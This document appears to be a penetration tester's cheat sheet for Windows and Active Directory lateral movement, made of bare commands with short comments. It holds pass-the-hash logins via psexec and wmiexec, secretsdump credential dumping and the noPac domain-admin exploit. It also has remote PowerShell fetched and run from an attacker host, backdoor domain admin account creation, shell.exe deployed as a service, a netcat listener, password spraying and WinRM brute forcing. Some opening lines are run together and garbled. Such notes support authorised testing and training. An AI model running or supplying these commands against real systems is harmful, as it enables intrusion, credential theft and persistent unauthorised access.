# Normal connectionsshmara@192.168.0.191# With Private Keychmod700key.txtssh-ikey.txtstinky@192.168.142.219# If you have a shell issue at loginssh-tmargo@192.168.103.110/bin/sh# XForwardssh-Xfox@$RHOST
When you see the following error - Too many authentication failures in ssh,
# File and Printer sharing must be enabled;
# The ADMIN$ share should be available.
# A member of Administrators
# @Kali
psexec.py vault.offsec/anirudh:SecureHM@192.168.51.172
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c user@192.168.1.2 cmd.exe
# port 445
# @Kali
smbclient.py THROWBACK.local/humphreyw:securitycenter@10.200.74.219
smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address]
smbclient.py -dc-ip 10.10.2.1 -target-ip 10.10.2.3 domain/user:password
>Shares
>Use <Share name>
>cd <directory>
>mget
>mput
etc.
# A member of Administrators
# @Kali
secretsdump.py -hashes LM:NTLM ./Administrator@TARGET
# A Domain User only required
# CVE-2021-42278 and CVE-2021-42287
# https://github.com/Ridter/noPac
python /opt/ad/noPac/noPac.py contoso.local/iptracej:'iptracej' -dc-ip 10.10.10.1 --impersonate Administrator -dump
# tcp/135 and tcp/445 and WMI tcp/50911 or like
# @Kali
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183
wmiexec.py xor.com/daisy@10.11.1.122 -hashes aad3b435b51404eeaad3b435b51404ee:f6084ca1a4905c45747d4bdcc1fcab84
# WinRM service running and port 5985 for HTTP traffic
# A member of Remote Management Users or Administrators
# @Victim Windows
PS> $pass = ConvertTo-SecureString "Password1" -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential("wgraff",$pass)
PS> Enter-PSSession -ComputerName MS03 -Credential $cred
Enter-PSSession -Computername TAGRET
Invoke-Command -Computername TARGET -ScriptBlock {whoami /priv}
Invoke-Command -ComputerName TARGET -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
# RDP port is open and the user is a member of Remote Desktop Users
# @Kali
rdesktop -u ariah -p NowiseSloopTheory 192.168.224.99
xfreerdp /u:ariah /v:192.168.224.99 +clipboard
xfreerdp /u:admin /d:domain /pth:hash:hash /v:192.168.1.101
# @Victim Windows
# Create another domain admin users and allows the users to do remote desktop
# Assumethat you are Administrator privileges
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net user rdpuser Password@123 /add /domain
net localgroup "Remote Desktop Users" rdpuser /add
net localgroup "Administrators" rdpuser /add # Local Admins
net group "Domain Admins" rdpuser /add /domain # Domain Admins
# Connect to the server
xfreerdp /u:rdpuser /p:Password@123 /v:10.129.197.120
# tcp/135
# Requires a member of Administrators
wmic /node:TARGET process call create "notepad.exe"
# @Victim Windows
copy shell.exe \\TARGET\C$\windows\temp
wmic /node:TARGET process call create “c:\windows\temp\shell.exe”
# Add a user
wmic /node:192.168.1.2 /user:CORP\user /password:password process call create "cmd.exe /c net user hacker P@ssw0rd /add"
# Requires a member of Administrators
# @Victim Windows
copy shell.exe \\TARGET\C$\windows\temp
sc \\TARGET create TestService binpath= "C:\windows\temp\shell.exe"
sc \\TARGET start TestService
# Kali
rlwrap nc -nlvp 1234
# PasswordSpray
# Kali
crackmapexec smb 192.168.1.106 -u /root/Desktop/user.txt -p 'Password@1' --rid-brute
# @Victim Windows
# You may have some error during the command execution
iex (new-Object Net.WebClient).DownloadString('http://10.10.10.100/post/DomainPasswordSpray.ps1')|Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Spring2017
Invoke-DomainPasswordSpray -Password Password0-
https://github.com/dafthack/DomainPasswordSpray]
# WimRM login BruteForce
iptracej@kali:/opt/bruteforce/winrm-brute$ bundle exec ./winrm-brute.rb -U users.txt -p '$fab@s3Rv1ce$1' 10.10.10.193